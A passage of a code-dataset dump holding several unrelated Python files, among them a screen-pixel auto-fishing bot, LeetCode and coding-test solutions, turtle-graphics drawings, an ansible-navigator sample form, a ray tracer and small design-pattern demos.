setup_detect_rgb.getpixel((1, 1))\r\n\r\n\r\nwhile initial_r != 231:\r\n print(\"Please realign Volume Mixer window. Then, press ENTER to check its position again.\")\r\n input(\"Expected R = 231, Detected Value = \" + str(initial_r))\r\n setup_detect = ImageGrab.grab(bbox=(x1, y1, x2, y2))\r\n setup_detect_rgb = setup_detect.convert(\"RGB\")\r\n initial_r, initial_g, initial_b = setup_detect_rgb.getpixel((1, 1))\r\n\r\nprint(\"Success: Detected R value matches Expected R value.\")\r\nprint(f\"\\nCurrent configuration:\\n\"\r\n f\"Resolution: {res}\\n\"\r\n f\"Scale Ratio: {scale}\\n\"\r\n f\"Anti-overfishing: {move_mouse}\\n\")\r\ninput(\"Press ENTER to run script\")\r\nprint(\"Executing in 5 seconds... Ctrl + C to quit\")\r\ntime.sleep(1)\r\nprint(\"Executing in 4...\")\r\ntime.sleep(1)\r\nprint(\"Executing in 3...\")\r\ntime.sleep(1)\r\nprint(\"Executing in 2...\")\r\ntime.sleep(1)\r\nprint(\"Executing in 1...\")\r\ntime.sleep(1)\r\n\r\nright_click()\r\nthrow_time = time.time() # start timer\r\ntime.sleep(1)\r\nwhile True: # forever loop\r\n if keyboard.is_pressed(exit_key):\r\n exit(0)\r\n bobber_sound = ImageGrab.grab(bbox=(x1, y1, x2, y2)) # scan for Volume Meter\r\n bobber_sound_rgb = bobber_sound.convert(\"RGB\") # convert ImageGrab area to RGB\r\n r, g, b = bobber_sound_rgb.getpixel((1, 1)) # read pixel RGB values\r\n time.sleep(0.02) # scanning frequency\r\n if r == 51: # is sound detected?\r\n right_click() # catch fish\r\n catch_time = time.time() # end timer\r\n catch_number += 1 # increment number of catches by 1\r\n time_to_catch = catch_time - throw_time # end timer and save Δtime.time()\r\n total_time += time_to_catch # update total time spent fishing\r\n avg_time = total_time / catch_number # update average time per fish caught\r\n print(\"Catch \" + str(catch_number) + \": \" + str(round(time_to_catch, 2)) + \" | AVG: \" + str(round(avg_time, 2)))\r\n # print fishing stats TODO: Formatting\r\n time.sleep(0.75) # time delay between catch and recast rod\r\n if move_mouse:\r\n if mouse_move_dir:\r\n for i in range(160):\r\n win32api.mouse_event(win32con.MOUSEEVENTF_MOVE, 5, 0, 0, 0)\r\n mouse_move_dir = False\r\n else:\r\n for i in range(160):\r\n win32api.mouse_event(win32con.MOUSEEVENTF_MOVE, -5, 0, 0, 0)\r\n mouse_move_dir = True\r\n right_click() # cast fishing rod\r\n throw_time = time.time() # start timer\r\n time.sleep(2) # wait for volume meter to die down\r\n","repo_name":"goonmandu/pyautofish","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13802489456","text":"def number(arr):\n seen = set()\n for i in arr:\n if 2 * i in seen or i / 2 in seen:\n return True\n seen.add(i)\n return False\n\n\n\nif __name__ == '__main__':\n arr = [4,1,3,3]\n print(number(arr))","repo_name":"Prakashchater/Leetcode-array-easy-questions","sub_path":"leetcode1346.py","file_name":"leetcode1346.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14957567391","text":"#20210622\n#월간 코드 챌린지 시즌2\n\n\ndef solution(left, right):\n answer = 0\n \n for num in range(left, right+1):\n count = 0\n for n in range(1, num+1):\n if num%n == 0:\n count += 1\n \n if count % 2 == 0:\n answer += num\n else:\n answer -= num\n \n \n return answer\n","repo_name":"jeomn/Algorithms","sub_path":"programmers/Level1/약수의 개수와 덧셈.py","file_name":"약수의 개수와 덧셈.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"15155295907","text":"# -*- encoding: utf-8 -*-\r\n\r\nimport turtle\r\n\r\nclass _Init_Turtle:\r\n\tdef __init__(self, \r\n\t\troot, \r\n\t\tstartPosition = (-300, -100), \r\n\t\tcolor = 'black', \r\n\t\tspeed = 0, \r\n\t\twidthline = 1, \r\n\t\tshow = True,): \r\n\r\n\t\tself.startPosition = startPosition\r\n\t\tself.color = color\r\n\t\tself.speed = speed\r\n\t\tself.widthline = widthline\r\n\t\tself.show = show\r\n\r\n\t\tself.root = root\r\n\t\tif self.show == False:\r\n\t\t\tself.root.hideturtle()\r\n\t\tself.root.color(self.color)\r\n\t\tself.root.speed(self.speed)\r\n\t\tself.root.width(self.widthline)\r\n\r\n\t\tself.root.penup()\r\n\t\tself.root.setpos(self.startPosition)\r\n\t\tself.root.pendown()\r\n\r\nclass L_Sistem(_Init_Turtle):\r\n\tdef __init__(self, root):\r\n\t\t_Init_Turtle.__init__(self, root)\r\n\r\n\tdef _main_function(self, \r\n\t\t\t\t\t\t\t\t\t\taxiom:str, \r\n\t\t\t\t\t\t\t\t\t\titr:int, \r\n\t\t\t\t\t\t\t\t\t\tangl:int, \r\n\t\t\t\t\t\t\t\t\t\ttranslate:tuple, \r\n\t\t\t\t\t\t\t\t\t\tcondition='F', \r\n\t\t\t\t\t\t\t\t\t\ttwo_condition=None):\r\n\t\timport random\r\n\t\taxmTemp = ''\r\n\t\tdl = 7\r\n\t\tcolors = ['red', 'blue', 'purple', 'green']\r\n\r\n\t\tfor _ in range(itr):\r\n\t\t\tfor ch in axiom:\r\n\t\t\t\taxmTemp += translate[ch]\r\n\t\t\taxiom = axmTemp\r\n\t\t\t#print(axiom)\r\n\t\t\taxmTemp = ''\r\n\r\n\t\tfor ch in axiom:\r\n\t\t\tif ch == '+':\r\n\t\t\t\tself.root.left(angl)\r\n\t\t\telif ch == '-':\r\n\t\t\t\tself.root.right(angl)\r\n\t\t\telif ch == condition or two_condition:\r\n\t\t\t\tcolor = colors[random.randrange(0, 4)]\r\n\t\t\t\tself.root.color(color)\r\n\t\t\t\tself.root.forward(dl)\r\n\r\n\tdef Koch_curve(self):\r\n\t\taxiom = 'F'\r\n\t\titr = 4\r\n\t\tangl = 90\r\n\t\ttranslate = {'+':'+', '-':'-', 'F':'F+F-F-F+F'}\r\n\t\tself._main_function(axiom, itr, angl, translate)\r\n\r\n\tdef Dracon_curve(self):\r\n\t\tself.root.penup()\r\n\t\tself.root.home()\r\n\t\tself.root.pendown()\r\n\t\taxiom = 'FX'\r\n\t\titr = 10\r\n\t\tangl = 90\r\n\t\ttranslate={'+':'+', '-':'-', 'F':'F', 'X':'X+YF+', 'Y':'-FX-Y'}\r\n\t\tself._main_function(axiom, itr, angl, translate)\r\n\r\n\tdef Sierpinski_swept_curve(self):\r\n\t\taxiom = 'F'\r\n\t\titr = 8\r\n\t\tangl = 60\r\n\t\ttranslate = {'+':'+', '-':'-', 'F':'B-F-B', 'B':'F+B+F'}\r\n\t\tself._main_function(axiom, itr, angl, translate, two_condition='B')\r\n\r\n\tdef Sierpinski_triangle(self):\r\n\t\tself.root.penup()\r\n\t\tself.root.goto(-200, 300)\r\n\t\tself.root.pendown()\r\n\t\taxiom = 'F-G-G'\r\n\t\titr = 6\r\n\t\tangl = 120\r\n\t\ttranslate = {'+':'+', '-':'-', 'F':'F-G+F+G-F', 'G':'GG'}\r\n\t\tself._main_function(axiom, itr, angl, translate, two_condition='G')\r\n\r\n\r\ndef main():\r\n\troot = turtle.Turtle()\r\n\tfractal = L_Sistem(root)\r\n\tprint(type(fractal.Dracon_curve()))\r\n\tl_systems = {\r\n\t\t'Koch curve': 'Koch_curve()',\r\n\t\t'Dracon curve': 'Dracon_curve()',\r\n\t\t'Sierpinski swept curve': 'Sierpinski_swept_curve()',\r\n\t\t'Sierpinski triangle': 'Sierpinski_triangle()'\r\n\t}\r\n\r\n\tsystem = l_systems['Dracon curve']\r\n\tprint(type(system))\r\n\t#fractal.system\r\n\r\nif __name__ == '__main__':\r\n\twindow = turtle.Screen()\r\n\twindow.setup(750, 750)\r\n\tmain()\r\n\twindow.update()\r\n\twindow.mainloop()","repo_name":"Maxim-K96/L-Systems","sub_path":"classTurtle.py","file_name":"classTurtle.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18989872079","text":"\"\"\"``:sample_form`` command implementation.\"\"\"\nfrom ansible_navigator.action_base import ActionBase\nfrom ansible_navigator.app_public import AppPublic\nfrom ansible_navigator.configuration_subsystem.definitions import ApplicationConfiguration\nfrom ansible_navigator.ui_framework import Interaction\nfrom ansible_navigator.ui_framework import dict_to_form\nfrom ansible_navigator.ui_framework import form_to_dict\nfrom ansible_navigator.utils.serialize import yaml\n\nfrom . import _actions as actions\n\n\nFORM = \"\"\"\nform:\n title: Please confirm the following information\n fields:\n - name: construct\n prompt: Please name an Ansible construct\n type: text_input\n validator:\n name: one_of\n choices:\n - collection\n - playbook\n - role\n - plugin\n - name: ansible_fest\n prompt: In 2019, AnsibleFest was held in what city?\n default: Atlanta\n type: text_input\n validator:\n name: none\n - name: what_is\n prompt: In Rocannon's World, an \"ansible\" is an instantaneous communication device\n type: text_input\n validator:\n name: yes_no\n - name: rh_acquire\n prompt: What year did Red Hat acquire Ansible\n default: 2015\n type: text_input\n validator:\n name: something\n - name: ansible_24\n prompt: Was Ansible 2.4 released in 2018\n type: text_input\n validator:\n name: true_false\n - name: fc_result\n type: checkbox\n prompt: Ansible can automate\n options:\n - name: clouds\n text: Clouds\n - name: lightbulbs\n text: Lightbulbs\n - name: linux\n text: Linux servers\n - name: network\n text: Networks\n checked: True\n - name: windows\n text: Windows servers\n - name: nothing\n text: Nothing\n disabled: True\n max_selected: 4\n - name: fr_result\n type: radio\n prompt: The most popular network module is\n options:\n - name: cli_command\n text: ansible.netcommon.cli_command\n - name: cli_config\n text: ansible.netcommon.cli_config\n - name: nxos_interfaces\n text: cisco.nxos.nxos_interfaces\n - name: file_name\n type: text_input\n prompt: Provide a valid file path\n validator:\n name: valid_file_path\n pre_populate: /etc/hostname\n\"\"\"\n\n\n@actions.register\nclass Action(ActionBase):\n \"\"\"``:sample_form`` command implementation.\"\"\"\n\n KEGEX = r\"^sample_form$\"\n\n def __init__(self, args: ApplicationConfiguration):\n \"\"\"Initialize the ``:sample_form`` action.\n\n :param args: The current settings for the application\n \"\"\"\n super().__init__(args=args, logger_name=__name__, name=\"sample_form\")\n\n def run(self, interaction: Interaction, app: AppPublic) -> Interaction:\n \"\"\"Execute the ``:sample_form`` request for mode interactive.\n\n :param interaction: The interaction from the user\n :param app: The app instance\n :returns: The pending :class:`~ansible_navigator.ui_framework.ui.Interaction`\n \"\"\"\n self._logger.debug(\"sample form requested\")\n self._prepare_to_run(app, interaction)\n\n form_data = yaml.safe_load(FORM)\n form = dict_to_form(form_data[\"form\"])\n interaction.ui.show_form(form)\n as_dict = form_to_dict(form)\n self._logger.debug(\"form response: %s\", as_dict)\n\n while True:\n self._calling_app.update()\n next_interaction: Interaction = interaction.ui.show(obj=as_dict)\n if next_interaction.name != \"refresh\":\n break\n\n self._prepare_to_exit(interaction)\n return next_interaction\n","repo_name":"ansible/ansible-navigator","sub_path":"src/ansible_navigator/actions/sample_form.py","file_name":"sample_form.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"99"} +{"seq_id":"39719297186","text":"from typing import List, Dict\n\nfrom torch.utils.data import Dataset\n\nimport torch\n\n\nclass dispDataset(Dataset):\n def __init__(\n self,\n data: List[Dict],\n task = 'train'\n ):\n self.data = data\n self.task = task\n model_type = 'MiDaS_small'\n midas_transforms = torch.hub.load(\"intel-isl/MiDaS\", \"transforms\")\n if model_type == \"DPT_Large\" or model_type == \"DPT_Hybrid\":\n self.transform = midas_transforms.dpt_transform\n else:\n self.transform = midas_transforms.small_transform\n\n def __len__(self) -> int:\n return len(self.data)\n\n def __getitem__(self, index) -> Dict:\n instance = self.data[index]\n return instance\n\n def collate_fn(self, samples: List[Dict]) -> Dict:\n img_list = []\n disp_list = []\n\n for sample in samples:\n # don't have groundtruth for inference, use disp_list to store original image\n if self.task == 'train':\n disp_list.append(self.transform(sample['disp']))\n print(disp_list[-1].shape)\n else:\n disp_list.append(sample['img_path'])\n disp_list.append(sample['img'])\n\n img_list.append(self.transform(sample['img']))\n\n img_list = torch.stack(img_list).squeeze(1)\n\n if self.task == 'train':\n disp_list = torch.stack(disp_list).squeeze(1)\n\n return {'img' : img_list, 'disp' : disp_list}\n","repo_name":"pinya52/Stereo-from-Monocular-Image","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28394364909","text":"#Matthew Enarle BSCS 1-B\nfrom turtle import *\n\nbgcolor(\"black\")\nspeed(3000)\n\ndef drawRasengan():\n colors = ['yellow', 'orange', 'blue', 'silver']\n for line in range(180):\n penup()\n goto(0,0)\n pendown()\n left(1)\n for curve in range(4):\n if curve == 0:\n color( colors[0])\n elif curve == 1:\n color( colors[1])\n elif curve == 2:\n color( colors[2])\n elif curve == 3:\n color( colors[3])\n forward(50)\n left(50)\n\ndef drawShuriken():\n color(\"red\")\n penup()\n goto(100,92)\n pendown()\n for i in range(100):\n left(120)\n forward(i)\n backward(i%800)\n left(145)\n forward(200)\n\n\ndef drawCenter():\n penup()\n goto(-5,-5)\n pendown()\n for times in range(36):\n color(\"white\")\n speed(11)\n circle(20)\n left(170)\n left(20)\n forward(15)\n\ndrawShuriken()\ndrawCenter()\ndrawRasengan()\n\n\nhideturtle()\ndone()\n\n\n#shuriken source: https://www.youtube.com/watch?v=vAZ5CycYDtE\n#modified his design wherein the shuriken acts as the spikes of a beyblade, more specifically, edited the loop iteration and radius and the number of spikes\n\n#rasengan source: https://replit.com/@Roger_Lai/mega-rasengan\n#changed the colors of the rasengan to make it seem like the body of the blade\n\n","repo_name":"mattenarle10/epic1-midterm-output","sub_path":"beyblade.py","file_name":"beyblade.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36302023407","text":"from abc import ABC, abstractmethod\nfrom enum import Enum\n\n\nclass Attribute(Enum):\n ATTACK = 1\n DEFENSE = 2\n\n\nclass Query:\n def __init__(self, creature, attribute_type, attribute_initial_value):\n self.creature = creature\n self.attribute_type = attribute_type\n self.value = attribute_initial_value\n\n\nclass CreatureModifier(ABC):\n def __init__(self, creature):\n self.creature = creature\n\n @abstractmethod\n def handle(self, sender, query):\n pass\n\n\nclass Creature:\n def __init__(self, game, attack, defense):\n self.game = game\n self.initial_attack = attack\n self.initial_defense = defense\n\n # self.game.creatures.append(self)\n\n def __str__(self) -> str:\n return f'{type(self).__name__} ({self.attack}/{self.defense})'\n\n @property\n def attack(self):\n query = Query(self, Attribute.ATTACK, self.initial_attack)\n\n self.game.process_query(self, query)\n\n return query.value\n\n @property\n def defense(self):\n query = Query(self, Attribute.DEFENSE, self.initial_attack)\n\n self.game.process_query(self, query)\n\n return query.value\n\n\nclass Goblin(Creature, CreatureModifier):\n def __init__(self, game, attack=1, defense=1):\n super().__init__(game, attack, defense)\n\n def handle(self, sender, query):\n if sender != self and query.attribute_type == Attribute.DEFENSE:\n query.value += 1\n\n\nclass GoblinKing(Goblin, CreatureModifier):\n def __init__(self, game):\n super().__init__(game, attack=3, defense=3)\n\n def handle(self, sender, query):\n if sender != self and query.attribute_type == Attribute.ATTACK:\n query.value += 1\n super().handle(sender, query)\n\n\nclass Game:\n def __init__(self):\n self.creatures = []\n\n def process_query(self, sender, query):\n for creature in self.creatures:\n creature.handle(sender, query)\n\n\nif __name__ == '__main__':\n game = Game()\n goblin = Goblin(game)\n g2 = Goblin(game)\n g3 = Goblin(game)\n game.creatures.append(goblin)\n game.creatures.append(g2)\n game.creatures.append(g3)\n\n print('Before king (3 goblins')\n print(goblin)\n print(g2)\n print(g3)\n\n print('----------')\n\n king = GoblinKing(game)\n game.creatures.append(king)\n\n print('After king')\n print(king)\n print(goblin)\n print(g2)\n print(g3)\n","repo_name":"adrianopaduam/python_design_patterns","sub_path":"Structural Patterns/Chain of Responsability/03.exercise.py","file_name":"03.exercise.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12320092374","text":"import numpy as np\nimport math\nimport utils\nimport refl_refr\n\n\nclass Primitive:\n def __init__(self, cfg):\n orientation = np.array([cfg['lcs']['h'], cfg['lcs']['p'], cfg['lcs']['r']])\n pos = np.array([cfg['lcs']['x'], cfg['lcs']['y'], cfg['lcs']['z']])\n scale = np.array([cfg['lcs']['sx'], cfg['lcs']['sy'], cfg['lcs']['sz']])\n rotation = utils.get_rotation_matrix(orientation)\n translation = utils.get_translation_matrix(pos)\n scale = utils.get_scale_matrix(scale)\n o2w, w2o = utils.get_o2w_w2o_matrices(translation, rotation, scale)\n self.o2w_ = np.copy(o2w)\n self.w2o_ = np.copy(w2o)\n # self.o2w_tr_ = np.copy(np.linalg.inv(self.o2w_.transpose()))\n self.o2w_tr_ = self.o2w_.transpose()\n\n self.color_ = np.array(\n [cfg['material']['color']['r'], cfg['material']['color']['g'], cfg['material']['color']['b']])\n self.material_type_ = refl_refr.MaterialTypes.DIFFUSE\n if ('type' in cfg['material']) is True:\n if cfg['material']['type'] == 'REFLECTION':\n self.material_type_ = refl_refr.MaterialTypes.REFLECTION\n elif cfg['material']['type'] == 'REFLECTION_AND_REFRACTION':\n self.material_type_ = refl_refr.MaterialTypes.REFLECTION_AND_REFRACTION\n self.refr_index_ = 1.0\n if ('refr_index' in cfg['material']) is True:\n self.refr_index_ = cfg['material']['refr_index']\n self.refl_coef_ = 0.5\n if ('refl_coef' in cfg['material']) is True:\n self.refl_coef_ = cfg['material']['refl_coef']\n self.K_d_ = 0.3\n if ('K_d' in cfg['material']) is True:\n self.K_d_ = cfg['material']['K_d']\n self.K_s_ = 0.5\n if ('K_s' in cfg['material']) is True:\n self.K_s_ = cfg['material']['K_s']\n\n def ray2object(self, start_pos, d):\n s = np.copy(start_pos)\n r = np.copy(d)\n\n s = np.append(s, [1.0])\n r = np.append(r, [0.0])\n s = np.matmul(self.w2o_, s)\n s = s / s[3]\n r = np.matmul(self.w2o_, r)\n # r = r / r[3]\n return s[0:3], r[0:3]\n\n def point2world(self, point):\n p = np.copy(point)\n p = np.append(p, [1.0])\n p = np.matmul(self.o2w_, p)\n p = p / p[3]\n return p[0:3]\n\n def normal2world(self, normal):\n n = np.copy(normal)\n n = np.append(n, [0.0])\n n = np.matmul(self.o2w_tr_, n)\n return n[0:3]\n\n def get_all_intersections(self, start_pos, d): # returns list of (point, normal)\n return []\n\n def intersect(self, start_pos, d, color_mode, dist_range=0):\n s, r = self.ray2object(start_pos, d)\n r = r / np.linalg.norm(r)\n intersections = self.get_all_intersections(s, r)\n closest_t = np.inf\n intersection = None\n for elem in intersections:\n t = np.linalg.norm(elem[0] - start_pos)\n if t < closest_t:\n closest_t = t\n intersection = np.copy(elem)\n if intersection is None:\n return None\n p = self.point2world(intersection[0])\n n = self.normal2world(intersection[1])\n n = n / np.linalg.norm(n)\n\n color = None\n if color_mode == utils.ColorModes.NORMAL:\n color = np.abs(n)\n elif color_mode == utils.ColorModes.DISTANCE:\n col = np.linalg.norm(p - start_pos)\n color = col / dist_range\n elif color_mode == utils.ColorModes.UNIFORM:\n color = self.color_\n return [color, p, n]\n\n\nclass Sphere(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.rad_ = cfg['sphere']['r']\n\n def get_all_intersections(self, start_pos, d):\n rad = self.rad_\n # d = dir\n k1 = np.dot(d, d) # == 1\n k2 = 2.0 * np.dot(start_pos, d)\n k3 = np.dot(start_pos, start_pos) - rad ** 2\n discr = k2 ** 2 - 4 * k1 * k3\n if discr >= 0:\n t1 = (-k2 + math.sqrt(discr)) / 2 / k1\n t2 = (-k2 - math.sqrt(discr)) / 2 / k1\n result = []\n if t1 > 0.0:\n result.append((start_pos + t1 * d, self.get_normal(start_pos + t1 * d)))\n if t2 > 0.0:\n result.append((start_pos + t2 * d, self.get_normal(start_pos + t2 * d)))\n return result\n return []\n\n def get_normal(self, p):\n n = np.array([2.0 * p[0], 2.0 * p[1], 2.0 * p[2]])\n return n / np.linalg.norm(n)\n\n\nclass Plane(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.width_ = cfg['plane']['width']\n self.height_ = cfg['plane']['height']\n self.normal_ = np.array([0.0, 0.0, 1.0])\n\n def get_all_intersections(self, start_pos, d):\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n denom = np.dot(d, self.normal_)\n if np.abs(denom) > 1.0e-5:\n t = np.dot(-start_pos, self.normal_) / denom\n if t < 0.0:\n return []\n p = start_pos + t * d\n if p[0] > 0.5 * self.width_ \\\n or p[0] < -0.5 * self.width_ \\\n or p[1] > 0.5 * self.height_ \\\n or p[1] < -0.5 * self.height_:\n return []\n return [(p, self.normal_)]\n return []\n\n def get_normal(self, p):\n return self.normal_\n\n\nclass Cylinder(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.rad_ = cfg['cylinder']['r']\n self.height_ = cfg['cylinder']['h']\n\n def intersect_with_disks(self, start_pos, d):\n result = []\n rad = self.rad_\n positions = [np.array([0.0, 0.0, 0.5 * self.height_]), np.array([0.0, 0.0, -0.5 * self.height_])]\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n normals = [np.array([0.0, 0.0, 1.0]), np.array([0.0, 0.0, -1.0])]\n for i in range(len(positions)):\n denom = np.dot(d, normals[i])\n if np.abs(denom) <= 1.0e-5:\n return []\n t = np.dot(positions[i] - start_pos, normals[i]) / denom\n if t < 0.0:\n continue\n p = start_pos + t * d\n if (p[0] - positions[i][0]) ** 2 + (p[1] - positions[i][1]) ** 2 <= rad ** 2:\n result.append((p, np.copy(normals[i])))\n return result\n\n def intersect_with_cylinder(self, start_pos, d):\n rad = self.rad_\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n k1 = d[0] ** 2 + d[1] ** 2\n k2 = 2.0 * d[0] * start_pos[0] + 2.0 * d[1] * start_pos[1]\n k3 = start_pos[0] ** 2 + start_pos[1] ** 2 - rad ** 2\n discr = k2 ** 2 - 4 * k1 * k3\n if discr >= 0:\n t = []\n p = []\n t.append((-k2 + math.sqrt(discr)) / 2 / k1)\n t.append((-k2 - math.sqrt(discr)) / 2 / k1)\n p.append(start_pos + t[0] * d)\n p.append(start_pos + t[1] * d)\n result = []\n for i in [0, 1]:\n if -0.5 * self.height_ <= p[i][2] <= 0.5 * self.height_ and t[i] > 0.0:\n result.append((p[i], self.get_normal_for_cylinder(p[i])))\n return result\n return []\n\n def get_all_intersections(self, start_pos, d):\n return self.intersect_with_cylinder(start_pos, d) + self.intersect_with_disks(start_pos, d)\n # return self.intersect_with_disks(start_pos, ray)\n\n def get_normal_for_cylinder(self, p):\n # return np.array([1.0, 0.0, 0.0])\n n = np.array([2.0 * p[0], 2.0 * p[1], 0.0])\n return n / np.linalg.norm(n)\n\n\nclass Cone(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.rad_ = cfg['cone']['r']\n self.height_ = cfg['cone']['h']\n\n def intersect_with_disk(self, start_pos, d):\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n normal = np.array([0.0, 0.0, -1.0])\n denom = np.dot(d, normal)\n if np.abs(denom) > 1.0e-5:\n t = np.dot(-start_pos, normal) / denom\n if t < 0.0:\n return []\n p = start_pos + t * d\n if p[0] ** 2 + p[1] ** 2 <= self.rad_ ** 2:\n return [(p, normal)]\n return []\n\n def intersect_with_cone(self, start_pos, d):\n ratio = self.rad_ / self.height_\n top = np.array([0.0, 0.0, self.height_])\n # d = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n k1 = d[0] ** 2 + d[1] ** 2 - (ratio * d[2]) ** 2\n k2 = 2.0 * d[0] * (start_pos[0] - top[0]) + 2.0 * d[1] * (start_pos[1] - top[1]) - 2.0 * (ratio ** 2) * d[2] * (\n start_pos[2] - top[2])\n k3 = (start_pos[0] - top[0]) ** 2 + (start_pos[1] - top[1]) ** 2 - (ratio * (start_pos[2] - top[2])) ** 2\n discr = k2 ** 2 - 4 * k1 * k3\n if discr >= 0:\n t = []\n p = []\n t.append((-k2 + math.sqrt(discr)) / 2 / k1)\n t.append((-k2 - math.sqrt(discr)) / 2 / k1)\n p.append(start_pos + t[0] * d)\n p.append(start_pos + t[1] * d)\n result = []\n for i in [0, 1]:\n if 0.0 <= p[i][2] <= self.height_ and t[i] > 0.0:\n result.append((p[i], self.get_normal_for_cone(p[i])))\n return result\n return []\n\n def get_all_intersections(self, start_pos, d):\n return self.intersect_with_disk(start_pos, d) + self.intersect_with_cone(start_pos, d)\n\n def get_normal_for_cone(self, p):\n n = np.array([2.0 * p[0], 2.0 * p[1], -2.0 * p[2] * (self.rad_ / self.height_) ** 2])\n return n / np.linalg.norm(n)\n # return np.array([1.0, 0.0, 0.0])\n\n\nclass Triangle(Primitive):\n def __init__(self, cfg):\n super().__init__(cfg)\n self.v0_ = np.array([cfg['triangle']['x1'], cfg['triangle']['y1'], cfg['triangle']['z1']])\n self.v1_ = np.array([cfg['triangle']['x2'], cfg['triangle']['y2'], cfg['triangle']['z2']])\n self.v2_ = np.array([cfg['triangle']['x3'], cfg['triangle']['y3'], cfg['triangle']['z3']])\n normal = np.cross(self.v1_ - self.v0_, self.v2_ - self.v0_)\n\n self.normal_ = normal / np.linalg.norm(normal)\n self.d_ = np.dot(self.normal_, self.v0_)\n\n def get_all_intersections(self, start_pos, d):\n # r = (ray - start_pos) / np.linalg.norm(ray - start_pos)\n denom = np.dot(d, self.normal_)\n if np.abs(denom) < 1.0e-5:\n return []\n t = -(np.dot(self.normal_, start_pos) + self.d_) / denom\n if t < 0.0:\n return []\n p = start_pos + t * d\n edge0 = self.v1_ - self.v0_\n vp0 = p - self.v0_\n c0 = np.cross(edge0, vp0)\n if np.dot(self.normal_, c0) < 0:\n return []\n\n edge1 = self.v2_ - self.v1_\n vp1 = p - self.v1_\n c1 = np.cross(edge1, vp1)\n if np.dot(self.normal_, c1) < 0:\n return []\n\n edge2 = self.v0_ - self.v2_\n vp2 = p - self.v2_\n c2 = np.cross(edge2, vp2)\n if np.dot(self.normal_, c2) < 0:\n return []\n return [(p, self.normal_)]\n\n def get_normal(self, p):\n return self.normal_\n","repo_name":"PozigunMikhail/Ray-Tracing","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1404066944","text":"import sys\ninput = sys.stdin.readline\n\nsent = input()\n\nops = [] # 연산자만 넣을 리스트\nnums = [] # 숫자만 넣을 리스트\n\n# 숫자와 연산자 분리해서 각각 ops와 nums에 넣어주는 과정\nnum = \"\"\nfor i in range(len(sent)):\n if sent[i].isdigit():\n num += sent[i]\n else:\n nums.append(int(num))\n num = \"\"\n\n if i != len(sent)-1:\n ops.append(sent[i])\n\n\nres = 0\nsums = []\nwhile ops:\n # 연산자 하나씩 pop 해오면서\n op = ops.pop()\n # -가 나오면 이전에 + 묶어줬던 값들의 합 result에서 빼주기\n if op == \"-\":\n sums.append(nums.pop())\n res -= sum(sums)\n sums = []\n # +가 나오면 한꺼번에 묶어서 뺄셈 해주기 위해... sums라는 리스트에 추가\n elif op == \"+\":\n sums.append(nums.pop())\n\n# 제일 마지막 값 처리\nres += nums.pop()\n# sums에 값 남아있을 경우 처리\nif sums:\n res += sum(sums)\nprint(res)\n","repo_name":"pseeej/CodingTest","sub_path":"1541.py","file_name":"1541.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"28458860372","text":"import json\nimport requests\n\n\nreq = requests.get(\"https://swapi.dev/api/people/3/\")\nprint(req.status_code)\ncharacter = req.json()\ncharacter = json.loads(character)\nprint(character)\n# print(f\"Here is the new character {character['name']}\" )\n# print(character['birth_year'])\n\n# print(\"Movies appeared in: \")\n\n# for movies in character['films']:\n# req = requests.get(movies)\n# movie = req.json()\n# print(movie['title'])\n\n\n# def get_film_titles(urls):\n# film_titles = []\n# for url in urls:\n# response = requests.get(url)\n# if response.ok:\n# film_data = response.json()\n# film_titles.append(film_data['title'])\n# return film_titles\n\n# # Main function to retrieve character's films\n# def get_character_films(json_data):\n# films_urls = json_data['films']\n# film_titles = get_film_titles(films_urls)\n# return film_titles","repo_name":"neilbhosle/practicefolder","sub_path":"apiRequests.py","file_name":"apiRequests.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38476998723","text":"import numpy as np\nfrom sklearn.metrics import roc_curve\n\npos = 5430\nneg = 495*383-5430\ny1 = np.loadtxt('imcmda.txt',delimiter=',').flatten()\ny2 = np.loadtxt('spm.txt',delimiter=',').flatten()\ny3 = np.loadtxt('nimcgcn.txt',delimiter=',').flatten()\ny4 = np.loadtxt('mclpmda.txt',delimiter=',').flatten()\ny5 = np.loadtxt('gaemda.txt',delimiter=',').flatten()\ny6 = np.loadtxt('nimgmda.txt',delimiter=',').flatten()\nldi = np.loadtxt('m-d.txt',delimiter=',').flatten()\n\ndef count(fpr,tpr,a):\n i = np.abs(fpr-a).argmin()\n fp = fpr[i] * neg\n tn = neg - fp\n tp = tpr[i] * pos\n fn = pos - tp\n return tp,tn,fp,fn\n\ndef binarymetrics(count):\n TP,TN,FP,FN = count\n Sn = 